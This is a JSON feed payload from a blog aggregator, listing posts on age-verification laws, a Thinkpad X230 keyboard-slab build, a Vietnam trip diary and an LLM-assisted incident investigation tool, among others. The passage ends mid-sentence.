[{"data":1,"prerenderedAt":3359},["ShallowReactive",2],{"planet-meta":3,"planet-doc-pnudupa":3286},{"posts":4,"authors":3269},[5,19,31,42,60,72,87,98,106,113,123,134,141,154,165,172,179,188,195,206,217,229,236,247,254,261,268,275,283,290,297,304,312,323,333,342,353,360,370,379,386,393,403,414,421,428,435,442,449,458,465,472,479,487,494,501,508,515,522,534,541,548,555,562,569,576,583,590,597,604,615,622,629,636,643,650,657,664,671,678,685,692,702,709,716,724,733,740,749,756,763,770,777,784,791,798,805,812,822,829,838,845,853,860,867,874,881,889,896,903,910,917,924,933,940,947,954,961,968,975,986,993,1000,1007,1014,1021,1028,1035,1042,1049,1057,1065,1072,1079,1086,1094,1101,1109,1116,1123,1130,1137,1145,1152,1160,1168,1175,1182,1189,1196,1203,1210,1217,1224,1234,1241,1248,1255,1262,1269,1276,1283,1290,1297,1304,1311,1317,1324,1331,1339,1347,1354,1361,1369,1376,1383,1390,1398,1406,1413,1420,1432,1439,1446,1453,1460,1467,1474,1481,1488,1495,1502,1509,1516,1523,1530,1537,1544,1551,1558,1565,1572,1579,1586,1593,1600,1607,1614,1622,1632,1642,1649,1656,1663,1670,1677,1684,1691,1698,1705,1712,1720,1727,1734,1742,1749,1756,1763,1770,1778,1789,1795,1801,1808,1815,1822,1829,1836,1842,1849,1856,1863,1870,1877,1884,1890,1897,1904,1911,1918,1925,1933,1940,1947,1954,1961,1968,1975,1982,1989,1996,2003,2010,2017,2024,2031,2038,2045,2052,2059,2065,2072,2079,2086,2093,2100,2107,2114,2121,2128,2135,2142,2149,2156,2163,2170,2177,2184,2191,2201,2208,2215,2222,2229,2236,2244,2255,2262,2269,2276,2283,2290,2297,2304,2311,2318,2324,2331,2338,2345,2352,2359,2366,2373,2380,2387,2394,2401,2408,2415,2422,2429,2436,2443,2450,2460,2472,2479,2486,2493,2500,2507,2514,2521,2528,2535,2542,2549,2556,2562,2569,2576,2583,2590,2597,2604,2611,2618,2625,2632,2639,2646,2653,2660,2667,2674,2681,2688,2695,2702,2709,2716,2723,2730,2737,2744,2751,2758,2765,2772,2779,2786,2793,2800,2807,2814,2821,2828,2835,2842,2849,2856,2863,2870,2877,2884,2891,2898,2905,2912,2919,2926,2933,2940,2947,2954,2961,2968,2975,2982,2989,2996,3003,3010,3017,3024,3031,3038,3045,3052,3059,3066,3073,3080,3087,3094,3101,3108,3115,3122,3129,3136,3143,3150,3157,3164,3171,3178,3185,3192,3199,3206,3213,3220,3227,3234,3241,3248,3255,3262],{"slug":6,"title":7,"link":8,"pubDate":9,"contentSnippet":10,"tags":11,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"age-verification","Age Verification Laws: Is This the End of Privacy for Linux and Beyond?","https:\u002F\u002Fibcomputing.com\u002Fage-verification\u002F","Wed, 25 Mar 2026 15:52:03 +0000","The digital landscape is currently undergoing a massive shift as new legislation worldwide begins to target the foundation of our computing experience: the operating system. … \nThe post Age Verification Laws: Is This the End of Privacy for Linux and Beyond? appeared first on IB Computing.",[12,13,14],"GNU\u002FLinux","News","systemd","Mujeeb Rahman K","mujeebcpy","\u002Fimages\u002Fmujeebcpy_photo.jpg","https:\u002F\u002Fibcomputing.com\u002Ffeed",{"slug":20,"title":21,"link":22,"pubDate":23,"contentSnippet":24,"tags":25,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"09-x230-slab-html","Turning my Thinkpad X230 into a overpowered keyboardSlab","https:\u002F\u002Faryak.me\u002Fblog\u002F09-x230-slab.html","Mon, 23 Mar 2026 12:39:45 +0000","I removed the screen from my laptop—and it’s now more useful than\nbefore.\nAnyways, I recently got my hands on a used thinkpad X230 for around\n60$.\nThe machine is great, the keyboard even better, but the TN panel is\ngenuinely unusable.\nFor a while, I used it like a laptop as intended, but I can only do\nso much with a TN Panel whose max brightness is my Pixel’s 10%\nbrightness.\nInstead, I decided to cut my losses and just remove the display\naltogether, and use the thinkpad as a keyboard with my monitor.\nThe Hardware\nDoing this was pretty simple, I just had to open up the back of the\nlaptop, remove the hinge screws, and then slowly disconnect all the\nwires before removing the display assembly.\nAdditionally, I changed the Wi-Fi card to an atheros one for good\nmeasure. (God bless Libreboot)\nMain issue with this, was that the Thinklight is literally impossible\nto remove from the casing, so I kinda had to snap that wire out.\nI also removed the two wifi antennae that are glued to the display\ncasing, and kept it outside so wifi continues to work properly.\nI kept the webcam too, removed from the case and double tape’d to my\nmonitor - since somehow this ancient laptop seems to have a better\ncamera than my modern laptop.\nAfter doing all this, and very-safely electrical taping all the extra\nwires if i ever decide to put a new display on this, I got a think-slab\n:D\nAfter shot of my setup\n\nHowever, I had to add a few cmdline arguments on grub to make it\nwork.\n\u002Fetc\u002Fdefault\u002Fgrub:\n\nGRUB_CMDLINE_LINUX_DEFAULT=\"quiet iomem=relaxed i915.modeset=1 video=LVDS-1:d video=VDA-1:e\"\n\nThe first 3 are common grub parameters that you always have, while\nthe last 2 are the special ones you need to add the :d parameter\ndisables LVDS-1 (internal display), and the :e parameter enables VDA-1\n(in my case, the external display)\nAn update-grub later, everything magically started\nappearing on my monitor!\nThe software\nThis worked great for research and other random stuff I did, but a\nlaptop from 2012 can only do so much in terms of computing.\nTo remedy this, I decided to just use the thinkpad keyboard with my\nmodern laptop using software KVM. Since my monitor has both VGA and\nHDMI, I was able to connect my modern laptop to the HDMI port, and the\nthinkpad to VGA.\nThough I was just planning on using barrier like I did year’s ago, I\ndecided to go with Lan-Mouse this\ntime.\nIt is a rust-based application similar to synergy and barrier, but\nwith a proper gtk UI and supposedly better performance.\nNow, since I have a wireless card that’s older than me on the\nthinkpad, I had to do some ethernet magic for lan mouse if I wanted any\nsort of real performance. Software KVM is a high-bandwidth task after\nall.\nSo I connected an ethernet cable between the two laptops, and set it\nup as follows\n# On Modern laptop\nnmcli con add type ethernet ifname enp2s0 ip4 192.168.50.1\u002F24\n# On Thinkpad\nnmcli con add type ethernet ifname eno0 ip4 192.168.50.2\u002F24\n\nAnd magically, I have a Gigabit connection between the two laptops\nfor Lan-Mouse to work through. Lan mouse is pretty intuitive to setup,\nso im not covering it here.\nIn conclusion, this one day’s work turned out pretty well for me. I\nnow have a speedy “slabtop” for any research or minor work that I have,\nand it doesn’t even take 5 minutes for this setup to convert into a\nhigh-performance workstation either.\nI’m still using the X230 without lan-mouse for home usage, when I’m\ntoo lazy to get my laptop out of my bag, but this setup really helps me\nwhen I need to get some real programming work done, which is 10x harder\nwithout such a comfy keyboard like that of the X230.",[26],"2026\u002F03\u002F23\u002F1","Arya K.","aryak","\u002Fimages\u002Faryak_photo.png","https:\u002F\u002Faryak.me\u002Frss.xml",{"slug":32,"title":33,"link":34,"pubDate":35,"contentSnippet":36,"tags":37,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"vietnam-trip","Vietnam Trip","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fvietnam-trip\u002F","Sun, 22 Mar 2026 01:00:37 +0530","Before reaching Vietnam\nContinuing from the last post, Badri and I took a flight from the Brunei International Airport to Kuala Lumpur on the 12th of December 2024. We reached Kuala Lumpur in the evening.\nAfter arriving at the airport, we went through immigration. In a previous post, I mentioned that we had put our stuff in lockers at the TBS bus terminal in Kuala Lumpur. Therefore, we had to go there.\nThe locker was automated and required us to enter the PIN we had set. Upon entering the PIN, the locker wasn’t getting unlocked. After trying this for 10-15 minutes without any luck, we tried getting some help as there the lockers weren’t under supervision.\nSo, I roamed around and found a staff member, reporting that our lockers weren’t getting unlocked. They called the person who was in-charge of the lockers. He came to us in a few minutes and used their admin access to open the locker. We were supposed to pay for using the lockers by putting the banknotes inside through a slot. However, as the machine wasn’t working, we gave the amount for the use of our locker service to that person instead.\nWe soon went back to the KL airport to catch our morning flight to Ho Chi Minh City in Vietnam. At the flight counter, we were afraid we would have to pay extra as our luggage surpassed the allowed weight limit. This one was also a budget airline—AirAsia—and our tickets didn’t include a check-in bag.\nGenerally, passengers from countries requiring a visa to visit Vietnam (such as India) require going to the airline and showing their visa to get the boarding pass. However, when we went to the AirAsia counter at the Kuala Lumpur airport, they didn’t weigh our bags and asked us to get our boarding passes from an automated kiosk. So, we got our boarding passes printed and proceeded to the airport security.\nWhile clearing the airport security, a lotion I bought from Singapore was confiscated because it was 200 mL, exceeding the limit of 100 mL per bottle. Had that 200 mL liquid been in two different bottles of 100 mL each, I would have been allowed to take it in my carry-on bag, but a single 200 mL bottle wasn’t! I was allowed to keep it in the check-in bag, but I didn’t have it included in my ticket. Huh, airports and their weird rules :( The lotion was an expensive one, so having it thrown away did ruin my mood.\nOverview\nWe started our Vietnam trip from Ho Chi Minh City in the south on the 13th of December 2024 and finished it in Hanoi in the north on the 20th of December. We traveled from Ho Chi Minh City to Hanoi mostly by train, except for a hundred or so kilometers by bus, in chunks. On the way, we visited Nha Trang, Hoi An, and Hue. The distance between Ho Chi Minh City and Hanoi is 1700 km.\nFor your reference, here are those places labeled on Vietnam’s map.\n\n      \nA map of Vietnam with points of places we went to labeled. ©CARTO ©MAPTILER ©OPENSTREETMAP\nHo Chi Minh City\nWe landed in Ho Chi Minh City early morning on the 13th of December 2024. I was tired and sleepy as I hadn’t gotten a good night’s sleep. After going through immigration, we went to a currency exchange counter to get Vietnamese Dong. Unlike other countries on this trip, money exchange counters in Vietnam didn’t accept Indian rupees. Therefore, we exchanged euros to get Vietnamese dong at the airport.\nAfter getting out of the airport, we took a bus to the city center. It was 15,000 dongs—approximately 50 Indian rupees. Our plan was to meet Badri’s friend and stay the night at his apartment.\nSo we went to a café nearby and bought a coffee for each of us for 75,000 dongs. We went upstairs and sat for a while. The Wi-Fi password was mentioned on our bill. During the trip, I found out about the café culture of Vietnam. They have their own coffee brands (such as Highlands Coffee), and you can sit down at any of the cafés for work or wait for the rain to stop. It rained a lot while we were there, so we did use these cafés for that purpose.\nBadri’s friend met us there, and we roamed around the area a bit, which included roaming inside a beautiful park. Then Badri’s friend took us to a restaurant. Because I do not eat meat, he took us to a vegan restaurant. Having been to four Southeast Asian countries at this point (excluding Vietnam), I was under the impression that there wouldn’t be a lot of things for my diet in Vietnam.\n\n      \nA picture of the park we roamed around in Ho Chi Minh City. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHowever, I was pleasantly surprised at the restaurant. I found all the dishes to be tasty, especially their signature noodles called Pho. I liked another dish so much that I tracked down the restaurant again with Badri using the geotagged image of the bill I had taken earler to have it again. As a tip for vegans coming to Vietnam, the places having the letters “Chay” (without any accented letters) in their name are vegan only.\n\n      \nThis is the restaurant Badri’s friend took us to. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nOne of the dishes we had in the restaurant. This one was especially tasty. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nOne of the dishes we had in the restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nThese noodles are called Pho and are very popular in Vietnam. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nIn the night, we went to a supermarket where I got myself some oranges and guavas. Then, we went to a Japanese restaurant where I didn’t have anything, as there was no vegetarian option available for me. Then we took a free bus to the place to Badri’s friend’s apartment. The construction company that built the apartment also runs this free bus service from their residential area to different parts of the city as a way of promoting their apartments. Anyone can take the bus, not just residents.\nThe next day, we took the free bus back to the city center and checked in to a hostel for a night. We took two beds in dormitories, which were 88,000 dongs (270 rupees) for each bed for a night. In Vietnam, if you can spend around 300 rupees per night, you can get a bed in a decent hostel.\nTrain from Ho Chi Minh City to Nha Trang\nOn the night of the 15th of December 2024, we boarded a train from Ho Chi Minh City to Nha Trang. The ticket for each of us was 519,000 dongs (1600 Indian rupees). The train name was SNT2. When we reached the Ho Chi Minh City train station, we noticed that the station was rather small by Indian standards.\nAfter entering the train station, we went inside to the first platform, where the tickets were checked by a staff member. Ho Chi Minh City was the originating station for our train, so our train was already standing at the station. We had to cross the railway tracks on foot to reach the platform our train was on. Then we located our coach, where a ticket inspector was standing at the gate. He let us in after checking our tickets. In all these instances, we just had to show our digital boarding pass which we had received by email.\nUnlike Indian trains, the train didn’t have side berths. Additionally, I liked the fact that it had a dedicated space to put our bags in, which was very convenient. The train departed from Ho Chi Minh City at 21:05 and arrived in Nha Trang at 05:30 in the morning.\n\n      \nInterior of our train coach. Trains in Vietnam don’t have side berths, unlike India. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nA picture of the berths from our coach. It had three tiers, similar to a 3 AC coach in Indian trains. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nThe train had a cabin to put the bags in. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nNha Trang train station. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nNha Trang\nNha Trang is a coastal place, and we planned to go to a beach. We figured out that the bus to the airport goes can drop us near the beach. Therefore, we went to the bus station to get to the airport bus. The bus station was walking distance from the railway station. So, we decided to walk.\nOn the way, we stopped at a small shop for a coffee. The shop also gave a complimentary cup of green tea along with the coffee. I found out later that it is common for local shops to give a cup of complimentary green tea in Vietnam.\n\n      \nI got a complimentary cup of green tea along with coffee in Nha Trang. In this trip, Badri and I found out that this is customary at local places in Vietnam. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nSoon we reached the bus station and took a bus to the beach. It was 65,000 dongs (₹200). After getting down from the bus, I had coconut water and some eggs at a small local place.\n\n      \nEggs being cooked on a pan for my order. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThen we went to the beach, but nobody else was there. We spent some time there and went back to the place where the bus dropped us as it started raining. We couldn’t find a bus for some time. A taxi driver approached us and agreed to take us to the city center for 200,000 dongs (₹650). For reference, the place where he dropped us was 35 km from the place we took the taxi. Taxi fares in Vietnam were also cheap!\n\n      \nThe beach we went to in Nha Trang. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nNha Trang was a beautiful place, and so we roamed around for a while. Then we stopped at a Highlands Coffee branch for a while. Since Christmas was coming up, the café had a Christmas tree, and I liked the Christmas vibes. They were playing Mariah Carey’s All I Want for Christmas Is You.\n\n      \nThis one was shot in the city center. In this trip, Badri and I found out that this is customary at local places in Vietnam. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nInside a Highlands Coffee cafe in Nha Trang. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nA coffee I got from Highlands Coffee in Nha Trang. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nDuring the evening, we went to a local place to eat. The place mentioned “Chay” in its name, and you know what it means—it was a vegan place. There was a man there and no other customers. I don’t remember the names of the dishes we ordered, but it was a bowl of soupy noodles and a bowl of dry noodles. They were very tasty. To top that off, the meal was a total of 55,000 dongs (₹180) for both of us.\nThe host was welcoming and friendly. We had a nice conversation with the host. In Vietnam, restaurants give chopsticks to eat noodles. While Badri was good at using them, I wasn’t. So, the host of this restaurant helped me in using chopsticks. Although my technique was not perfect and I take a bit of time, I could now eat solely with chopsticks.\n\n      \nThe restaurant we went to in Nha Trang. The word Chay in the name means it was a vegan restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nSoupy noodles we got at that restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nDry noodles we got at that restaurant. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nOur plan was to take a night bus to Hoi An, and we were hoping to find a bus stand. However, we couldn’t find one. Asking around about the pickup location of the Hoi An bus led us to many different locations. Finally, we ended up at a bus booking agency’s office where we found out that there were no tickets available for Hoi An.\nAt this point, we gave up on booking the bus and searched for trains instead. As we didn’t have a local SIM, we asked the agency to let us connect to their Wi-Fi so that we could look for trains. They were kind enough to let us do that. It also seemed like they were going to close the office in like 10 minutes.\nUnfortunately, all the sleeper berths were booked from Nha Trang till Hoi An on the next train with only seating berths being available. It takes around 10 hours, so I wasn’t comfortable traveling on seating berths.\nHere I came up with the idea to look for sleeper berths from an intermediate stop. Fortunately, there were sleeper berths available from the next stop, Ninh Hòa. Therefore, we booked a seating berth from Nha Trang to Ninh Hòa and a sleeper berth from Ninh Hòa to Trà Kiệu (the nearest railway station from Hoi An). The train name was SE6, and it was a total of 500,000 dongs per person (₹1600 per person).\nSo, we went to the Nha Trang railway station and boarded the train. We had to spend 40 minutes seated for the train to reach the next stop before we could go to our sleeper berths. Badri had some friendly co-passengers on that trip who gave him Saigon beer and some crispy papad-like thing. They offered me as well, but I thought it was non-veg, so I declined it.\nHoi An\nOn the morning of 17th December 2024, we got down at the Trà Kiệu station at around 09:30. Our hostel was in Hoi An, which was around 22 km from the station. There was no public transport to get there.\nInstead, there was a taxi driver at the train platform. We told him the name of our hostel, and he quoted 270,000 dongs (around ₹850). We said it was too expensive for us, so he agreed to bargain at 250,000 dongs. At this point, we told him that we could give him no more than 200,000 dongs, but he didn’t agree.\nBadri tried a trick. He asked the driver to show us prices in the Grab app (a popular taxi booking app in Southeast Asia). Unfortunately, the Grab app showed 258,000 dongs, which was more than the fare the driver agreed to.\nSo we walked away as if we had so many options (we didn’t!) to reach the hostel. We got out of the station and stopped at a small shop outside to have some coffee. As is customary in Vietnam, we got a complimentary green tea here as well.\n\n      \nThis was the place we had our coffee in Tra Kieu. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThat taxi driver also joined us and sat in that shop. He started talking with the locals in the shop in the local language. The taxi driver was insistent on taking us to Hoi An for 250,000 dongs. At this point, Badri told the taxi driver (by the use of translation software) that we usually use public transport during our trips, and we aren’t used to paying high prices to get around. So, he can drop us somewhere in Hoi An for 200,000 dongs as we don’t mind walking a bit to reach our hotel.\nAfter reading this, the taxi driver agreed to take us to our hostel for 200,000 dongs (₹660). He also had me take a picture with Badri after this. I think such a bargain tactic would not work in India.\n\n      \nPhoto of Badri with taxi driver. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThe nice thing we noticed in Vietnam is, once bargaining is done and the deal is settled, people don’t try to bargain more or keep on talking about the subject. Before the deal, the driver was being somewhat insistent and argumentative, but after the deal was done, it was as if no argument had happened at all.\n\n      \nA picture of Tra Kieu area near the train station we got down at. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe were treated to some beautiful scenery on the way to our hostel. Soon we reached our place and completed all the formalities for checking-in. During the time our room was being prepared for check-in, we had an egg sandwich with coffee in the hotel. I found the egg sandwich very tasty. The bread looked like the French baguette. The hostel was ₹240 per night for each of us.\nThe name of the hostel was Bana Spa. We liked staying here and we can recommend it if you find yourself there. It is operated by a family.\n\n      \nOur breakfast in Hoi An. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nA photo of the hostel we stayed in Hoi An. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe also rented a bicycle for each of us—25,000 dongs per day (₹80)—and explored the old town during the evening. Hoi An is popular for Vietnamese silk. Tourists come here to buy fabric and get it done by the tailor. The buildings here looked old, and they were painted in yellow with a gabled roof.\n\n      \nTypical yellow house with gabled roof in Hoi An old town. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHere, I also had egg coffee for the first time, and I liked it. Egg coffee is a delicacy of Hanoi, but you can get it in other parts of Vietnam. If you find yourself in Vietnam, then I recommend you try egg coffee. We also bought some cool T-shirts and other souvenirs, such as a Vietnamese hat, from here.\n\n      \nEgg coffee I had in Hoi An. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHue\nThe next day—the 18th of December 2024—we went to Hue by bus. As we could not take a bus on our own in Nha Trang, we asked the hostel to book it for us this time. We booked it a day before, and they told us to be ready by 07:00 in the morning. At 07:00, a minibus arrived, which took us to a bus agency’s office. There we waited for a few minutes and got into the bus to Hue.\nThe bus had sleeper seats, so I took the opportunity to catch some sleep. The ride was comfortable, so I am assuming the roads were good. In a couple of hours, we reached Hue. Again, we went to Highlands Coffee to have some coffee, charge our phones, and use the internet, not to mention using the bathrooms.\nDuring the afternoon, we went to a local restaurant named Quán Chay Thanh Liễu. It was a vegan restaurant (remember the thing I mentioned earlier about “Chay” being in the name?). On the way, we had a steamed dumpling shaped like a momo called banh bao from a street vendor. It wasn’t very good, but I found it worthwhile.\n\n      \nBahn Bao in Hue. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nAt the restaurant, we ordered a hot pot. First, they brought noodles and a gas stove. Then came the stock and our gas stove was turned on. The stock was kept simmering on the stove. Then, we had it bit by bit with the noodles. A big hot pot at this place costs 50,000 dongs (₹170). Then we had bánh cuốn. These were steamed rolls made of rice flour for 10,000 dongs (₹33).\n\n      \nHot Pot. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nAdded soup to the noodles. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nSteamed rolls made of rice flour. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nRestaurants in Vietnam usually add photos of the meals in their menu or write a description in English. So, even though the dish names were Vietnamese, we had no problems in ordering food there. In addition, all the places we went to provided free Wi-Fi. They either mention the Wi-Fi password on the bill, on the menu or paste it on the wall. This made our trip smoother without getting a local SIM.\n\n      \nMenu from a restaurant in Ho Chi Minh City with detailed description of the food. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nWe had booked the train SE20 for Hanoi, which had a departure time of 20:41 from Hue. This one was 948,000 dongs (₹3100) for myself and 870,000 dongs (₹2900) for Badri. My ticket was pricier than Badri’s because I got a lower berth. Our train was late by half an hour, so we waited in the common area of the station. After the train arrived, we got inside and took our seats.\nThe cabin had four berths—two upper and two lower, similar to India’s First AC class. The ticket inspector came to us and offered us the whole cabin (two additional berths) for 300,000 dongs (₹1,000), which we declined. However, this hinted at the other two seats not being reserved. Eventually, we had the whole cabin to ourselves, as nobody else showed up for the other two berths. It was a 14-hour journey, and I got a good sleep.\n\n      \nOur berths in the train. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nHanoi\nOn the morning of the 19th of December 2024, we reached Vietnam’s capital, Hanoi. We had booked a private hotel room for ₹800. It was 1 km from the Hanoi Airport. However, it was pretty far from the railway station. So, we roamed around in the city and went to the hotel in the evening.\nFirst, we walked to a place and had egg coffee with egg sandwiches. Then we went to Hanoi Train Street, which was walking distance from the train station. After clicking some pictures at the train street, we went to a museum nearby. Upon reaching there, we found out that it was closed.\n\n      \nEgg coffee in Hanoi. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nHanoi train street is a tourist attraction in Hanoi. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nThen we went shopping for jackets, as Hanoi was cold compared to other parts of Vietnam we had been to, and since many of them are manufactured in Vietnam, we thought they would be cheaper. I liked some jackets, but they were not my size. Eventually, we didn’t buy anything at the clothes shop.\nIn the evening, I bought a Vietnamese-styled phin coffee filter and coffee powder from Highlands Coffee. We spent a lot of time in their cafes, so it made sense to buy some souvenirs from there. Badri bought a few coffee filters for his family at Trung Nguyen, where I also bought another filter.\nWe had dinner at a local place where we had pho and banh it. Bahn it was served packed in banana leaves and it was made of sticky rice.\n\n      \nA picture of pho we had in Hanoi. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nBahn it is served packed in banana leaves. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\n\n      \nBahn it. Photo by Ravi Dwivedi, released under CC-BY-SA 4.0.\nNext, we went to Hanoi railway station to catch a bus to the airport since our hotel was 1 km from the airport. The locals there helped us take the bus. It took like an hour to get to the airport. We saw on OpenStreetMap that we can take a bus from there to the hotel, but we could not find it. So we walked to our hotel instead.\nIt was a decent hotel room for ₹800 for a night. We went outside to explore the area and had egg sandwiches and egg coffee at a local place. Again, we were given a complimentary green tea. We went to this place like three times. We had practically become regulars by the time we left.\nThe next day— 20th of December 2024 — we took a bus to the airport and boarded our flight to Delhi.\nCredits: Thanks Badri, Kishy and Richard for proofreading.",[],"Ravi Dwivedi","ravidwivedi","\u002Fimages\u002Fravidwivedi_photo.jpg","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Findex.xml",{"slug":43,"title":44,"link":45,"pubDate":46,"contentSnippet":47,"tags":48,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html","Side-stepping the Secretary Problem, unwittingly.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fside-step-secretary-problem-hiring\u002Findex.html","Fri, 20 Mar 2026 00:00:00 +0000","Having played both parts in the kabuki play that is employee-employer matchmaking, I feel the way we play it is a zero-sum game. I wish it were not so. When this post started life in 2024, as a wall of text chat message, it was brutal out there, on both sides of the software industry interview table. The ZIRP had ended. As of 2026, post-ZIRP reality has properly set in and remains bad (\"AI\" is a Fig Leaf (Enterprise Edition) for structural damage they self-inflicted, and if you look at Hyperscaler GPU depreciation schedules, they are making it order-of-magnitude worse). Set to that backdrop, here is a hopefully hopeful hiring anecdote where I think we avoided the so-called \"Secretary Problem\", framed within Optimal Stopping Theory. It can be done. Non-zero-sum hiring ought to be default-mode for any industry, AI or no AI.",[49,50,51,52,53,54,55],"riff","organisation_design","hiring","clojure","culture","whyto","meta","Aditya Athalye","adityaathalye","\u002Fimages\u002Fadityaathalye_photo.jpg","https:\u002F\u002Fwww.evalapply.org\u002Findex.xml",{"slug":61,"title":62,"link":63,"pubDate":64,"contentSnippet":65,"tags":66,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"quote-born-from-story","கதையிலிருந்து பிறந்த கவிதை","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2026\u002F03\u002F16\u002Fquote-born-from-story\u002F","Mon, 16 Mar 2026 18:49:55 +0000","வேண்டும் வேண்டும் என வேண்டும் 🙏வெற்றிகள்என்னிடம் போதும் போதும் என கூறும் தோல்விகள்சிறுசிறு வெற்றிக்கும் மகிழ்ச்சி அடைந்தேன் அன்றுதினமும் மூன்று...கிடைக்குமா? சற்று பார்ப்போம் முயன்று 💪தீராக் காதல் அதீத அன்பினால் தினமும் மோதல்போதும் எல்லாம் என்று முடிக்கையில் மீண்டும் பூக்கும் சிறு காதல்ஊடலும் முடியவில்லை கோபமும் குறையவில்லைமுயற்சி செய்கிறேன் அமைதியாக! சந்தேகங்கள் எழாமலில்லைமதிமுகம் காணவந்தவன் நிம்மதி தேடியே அலைகிறேன்விதை விதைக்கையில் மரம் தழைக்குமா யோசிக்கிறேன்பிடித்ததை செய்கையில் பித்துப் பிடித்து போகிறதுகதையை முடிக்க செல்கையில் கவிதையோ தொடங்குகிறது -- […]",[67],"raw-quotes","Hariharan Umapathi","hariharanumapathi","\u002Fimages\u002Fhariharanumapathi_photo.png","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002Ffeed\u002F",{"slug":73,"title":74,"link":75,"pubDate":76,"contentSnippet":77,"tags":78,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"event-driven-architecture-in-algo-trading-platform-3a2957ff11a6","Event Driven Architecture in Algo Trading Platform","https:\u002F\u002Fopenalgo.medium.com\u002Fevent-driven-architecture-in-algo-trading-platform-3a2957ff11a6?source=rss-cda86e929c3------2","Sun, 15 Mar 2026 14:30:33 GMT","",[79,80,81,82,83],"event-driven-architecture","algorithmic-trading","openalgo","python","open-source","Rajandran R","marketcalls","https:\u002F\u002Fmedium.com\u002Ffeed\u002F@openalgo",{"slug":88,"title":89,"link":90,"pubDate":91,"contentSnippet":92,"tags":93,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"pi-sre-mode","Building an LLM-Assisted Incident Investigation Tool","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fpi-sre-mode\u002F","2026-03-12T00:00:00.000Z","When you are debugging a production incident, you are forming hypotheses, testing them against evidence, ruling things out, trying not to confuse correlation with causation, and making triage calls under time pressure. The hard part is the reasoning – figuring out why the system is misbehaving, deciding what to stabilize first, knowing when to stop chasing a red herring.\nBut a surprising amount of the time is not spent reasoning. It is spent gathering evidence.\nYou are flipping between your metrics dashboard, log viewer, scheduler, cloud console, SSH sessions, deployment history, and a half-written scratchpad. You are trying to answer questions that are conceptually simple but operationally expensive:\nWhat changed in the last hour?\nDid the error spike start before or after the deploy?\nIs this one sick node or a fleet-wide regression?\nDid the autoscaling event line up with the HAProxy alert?\nAre we looking at cause, effect, or a noisy side symptom?\nEach question requires pulling data from a different tool, in a different format, often with timestamps in different timezones. Then you stitch them into a timeline before you can even begin hypothesizing.\nThat evidence-gathering phase is where LLMs turned out to be useful for me. Not because they “solve incidents” – the hypothesis formation, the triage, the mitigation calls stay human. But an LLM with access to the right CLIs can chew through the data-gathering faster than I can by hand.\nI took the system I’d been building internally and rebuilt it as a package for Pi – a minimal, extensible terminal coding agent – called pi-sre-mode. This post is about the journey from a custom agent platform to a thin extension, and why the value turned out to live in content, not code.\nThe Predecessor: llmduck#\nBefore pi-sre-mode, I had a system called llmduck. It went through several rewrites – first in Go, then partially in Rust, and finally as a full TypeScript web application with a server (LLM orchestration, session persistence, WebSocket dispatch), a remote agent (command execution on production hosts with policy enforcement), and a React frontend with a split-panel investigation UI.\nThe agent had one tool: bash. All infrastructure interaction happened through CLIs – metrics, logs, scheduler state, cloud APIs, SSH. The LLM decided what to run, the agent executed it, and the server tracked the conversation. An SRE methodology skill guided the model through a structured investigation loop: triage, scope, gather evidence across metrics\u002Flogs\u002Fscheduling, correlate, conclude.\nIt worked. Give the model good operational guidance and read-only access to the right CLIs, and it can do a lot of the mechanical data gathering that normally burns 20-40 minutes during an incident. It can compare scheduler restarts with metric trends. It can correlate a failing backend with a cloud autoscaling event. It can notice that one host is missing metrics entirely and that the “healthy” cluster is only healthy because the remaining nodes are absorbing the load.\nBut the runtime was increasingly the wrong abstraction.\nI had a 